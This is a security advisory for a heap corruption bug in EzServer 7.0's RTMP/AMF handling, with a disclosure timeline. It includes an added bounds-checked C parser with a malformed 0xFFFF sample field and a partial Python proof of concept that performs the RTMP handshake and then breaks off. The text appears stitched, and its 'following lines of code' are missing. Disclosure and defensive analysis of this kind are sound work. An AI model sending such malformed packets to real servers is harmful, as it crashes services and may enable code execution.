[Description]:
EzServer is a software for audio and video streaming adopted by various companies worldwide. Version 7.0 is affected by a remote heap corruption vulnerability. Version 6.x is not affected by this issue, as it does not implement RTMP support.
[Impact]:
A remote unauthenticated attacker can DoS the application. Remote Command Execution could be possible; however, an exploit has yet to be developed.
[Details]:
The vulnerability is caused by the following lines of code:
The application passes to memcpy() an uncontrolled size, which is taken directly from the AMF request in the RTMP packet. After successfully completing the RTMP handshake, an attacker can send a malformed AMF request embedded in the RTMP session with a high value for the 'size' field (2 bytes, such as 0xFFFF) and a shorter 'string' (such as 'connect'). This results in a heap corruption and a crash of the application.
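As an added illustration (not EzServer's code nor the advisory's PoC), a bounds-checked AMF0 string reader in C that rejects exactly the mismatch described above: a declared 2-byte 'size' larger than the bytes actually received. The function name and the two sample fields are assumptions constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical bounds-checked AMF0 string reader (added example, not EzServer's
 * code). Input layout as the advisory describes it: a 2-byte big-endian 'size'
 * field followed by the string bytes. 'avail' is the number of bytes actually
 * received from the start of the field. Returns bytes consumed, or -1 on a
 * malformed field. The vulnerable pattern is memcpy(dst, src + 2, declared)
 * with no comparison of 'declared' against 'avail': a size of 0xFFFF with only
 * "connect" behind it copies far past the packet and corrupts the heap. */
int amf_read_string_checked(const uint8_t *src, size_t avail,
                            char *dst, size_t dst_cap)
{
    if (avail < 2)
        return -1;                         /* no room for the size field */
    size_t declared = ((size_t)src[0] << 8) | src[1];
    if (declared > avail - 2)
        return -1;                         /* declared size exceeds received bytes */
    if (declared + 1 > dst_cap)
        return -1;                         /* would overflow the destination */
    memcpy(dst, src + 2, declared);
    dst[declared] = '\0';
    return (int)(2 + declared);
}

/* Constructed sample fields (assumed, not captured traffic):
 * a well-formed "connect" and the 0xFFFF-size variant from the advisory. */
static const uint8_t GOOD_FIELD[] = { 0x00, 0x07, 'c','o','n','n','e','c','t' };
static const uint8_t BAD_FIELD[]  = { 0xFF, 0xFF, 'c','o','n','n','e','c','t' };

/* Wrappers that run the checked reader over each sample. */
int parse_good_sample(char *dst, size_t dst_cap)
{
    return amf_read_string_checked(GOOD_FIELD, sizeof GOOD_FIELD, dst, dst_cap);
}

int parse_bad_sample(char *dst, size_t dst_cap)
{
    return amf_read_string_checked(BAD_FIELD, sizeof BAD_FIELD, dst, dst_cap);
}
```

The same check belongs in front of every length-prefixed copy in an AMF decoder, not only the string case.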
[Fix]:
Support for the RTMP protocol appears disabled (but not fully removed) in version 7.1. However, there is no official response from the vendor (see disclosure).
[Proof of Concept code]:
http://pastebin.com/k05djr6C
[Disclosure]:
09/09/2012: Vendor contacted.
07/10/2012: No response. Sent another mail.
13/10/2012: Still no response. Disclosure.
#Ezhometech Ezserver 7.0 Remote Heap Corruption Vulnerability POC code
#Author: Lorenzo Cantoni
#CVE: CVE-2012-4750
#Link to vulnerable software: http://www.4shared.com/zip/eVs9I2Gf/ezserver70001_win.html
from socket import *
import sys
import os
import time

if len(sys.argv) >= 2:
    server = sys.argv[1]
else:
    server = "192.168.1.65"

s = socket(AF_INET, SOCK_STREAM)
s.connect((server, 1935))

# Handshake C0+C1 (sent by client). c0c1 is not defined in the published
# excerpt; it is built here per the RTMP specification: C0 = version byte 0x03,
# C1 = 4-byte timestamp + 4 zero bytes + 1528 random bytes (1537 bytes total).
c0c1 = b"\x03" + b"\x00\x00\x00\x00" + b"\x00\x00\x00\x00" + os.urandom(1528)
s.send(c0c1)
time.sleep(2)

# Handshake S0+S1+S2 (sent by server). Read until at least S0+S1 (1537 bytes)
# has arrived, since a single recv() may return a short read.
s0s1s2 = b""
while len(s0s1s2) < 1537:
    chunk = s.recv(1700)
    if not chunk:
        sys.exit("connection closed during handshake")
    s0s1s2 += chunk
time.sleep(2)

# Handshake C2
# parse the payload (S1) which has to be echoed back to the server
echo = s0s1s2[1:1537]